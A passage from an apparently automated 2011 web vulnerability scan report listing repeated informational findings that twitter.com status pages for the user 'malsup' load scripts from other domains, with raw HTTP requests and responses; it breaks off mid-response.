X-Transaction: 1296234462-43608-16469
ETag: "6f4159ba16106dbca0ab28e5abdcd87f"
Last-Modified: Fri, 28 Jan 2011 17:07:42 GMT
X-Runtime: 0.06398
Content-Type: text/html; charset=utf-8
Content-Length: 13549
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--af926656a34cc3f93d125f9734871e044d840812; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.478. http://twitter.com/malsup/status/29510556067041280

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29510556067041280

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29510556067041280 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224752-42900-60801
ETag: "d61b7e8839b68f0e6bbfeea3f24f11e7"
Last-Modified: Fri, 28 Jan 2011 14:25:52 GMT
X-Runtime: 0.06556
Content-Type: text/html; charset=utf-8
Content-Length: 13632
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTUxMDU1NjA2NzA0MTI4MDoMY3NyZl9pZCIlYjkxNjUxMjBkZmM0%250AYTJhMGUyNjZiZDRjZWFhMTg5YzQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--879a5af66cf85b03132a55e267e75f8e107db447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.479. http://twitter.com/malsup/status/29510556067041280

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29510556067041280

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29510556067041280 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225113-75187-19997
ETag: "a77c87b2d290924bf5a75e249dd9dcf2"
Last-Modified: Fri, 28 Jan 2011 14:31:53 GMT
X-Runtime: 0.22372
Content-Type: text/html; charset=utf-8
Content-Length: 13632
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTUxMDU1NjA2NzA0MTI4MDoMY3NyZl9pZCIlMDdlMWQxMGU0ZjM1%250AZDlmYjkzYjg3ZmNlYjkzYmExZDU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--141b7ea4243289f1bcdcfcdfe761c26559f23888; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.480. http://twitter.com/malsup/status/29705355999055872

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29705355999055872

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29705355999055872 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224751-25049-63292
ETag: "f4d24b4b0ce19c88101731df05975e44"
Last-Modified: Fri, 28 Jan 2011 14:25:51 GMT
X-Runtime: 0.26212
Content-Type: text/html; charset=utf-8
Content-Length: 13555
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoMY3NyZl9pZCIlNDAwZjBkMzA5YTgy%250AYzk1NGFhZGY3Y2YxMWZhNTEzNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c0d59aed3199a40c6a1fc20a84673263ba8b0524; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.481. http://twitter.com/malsup/status/29705355999055872

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29705355999055872

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29705355999055872 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:07:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234420-88697-41198
ETag: "d2e2198308508fbc4321dbe2f26bb933"
Last-Modified: Fri, 28 Jan 2011 17:07:00 GMT
X-Runtime: 0.06359
Content-Type: text/html; charset=utf-8
Content-Length: 13424
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c742841e736c0d120d0e73c3aa28ccfa29e67d46; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.482. http://twitter.com/malsup/status/29705355999055872

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29705355999055872

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29705355999055872 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225111-46886-40390
ETag: "be2e8a1c1b6d2015808fd3de2699ce73"
Last-Modified: Fri, 28 Jan 2011 14:31:51 GMT
X-Runtime: 0.05700
Content-Type: text/html; charset=utf-8
Content-Length: 13555
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoMY3NyZl9pZCIlY2U3Y2Q5MDVjNjU4%250AMzJiNWYyOTZjNWRmNGYxMjQzZWE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--089f16adbce34d7df374a5bdfa9b40d25d3e7204; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.483. http://twitter.com/malsup/status/30065585396121601

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30065585396121601

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30065585396121601 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234408-88044-3567
ETag: "1adee2ea84e20b6a09567f2281b31564"
Last-Modified: Fri, 28 Jan 2011 17:06:48 GMT
X-Runtime: 0.06860
Content-Type: text/html; charset=utf-8
Content-Length: 13514
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDA2NTU4NTM5NjEyMTYwMToVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--06cbb09535ee3bb5451f1950e750e9a94cd36d6e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.484. http://twitter.com/malsup/status/30065585396121601

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30065585396121601

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30065585396121601 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224746-71315-7024
ETag: "53739e8689a75eb0e462fb3f46dbe87a"
Last-Modified: Fri, 28 Jan 2011 14:25:46 GMT
X-Runtime: 0.06652
Content-Type: text/html; charset=utf-8
Content-Length: 13645
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDA2NTU4NTM5NjEyMTYwMToMY3NyZl9pZCIlNWViNDc0NjJhYjUy%250AYmJiMjUwZjk0ZjZiY2Q5NWQ2MjM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--a5345f31cffd9fbf70b4a6bddd83fd98f48576ba; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.485. http://twitter.com/malsup/status/30103594925555712

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30103594925555712

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30103594925555712 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225104-20738-31700
ETag: "bd8e5417d2e9bee9786aa103ca950e1b"
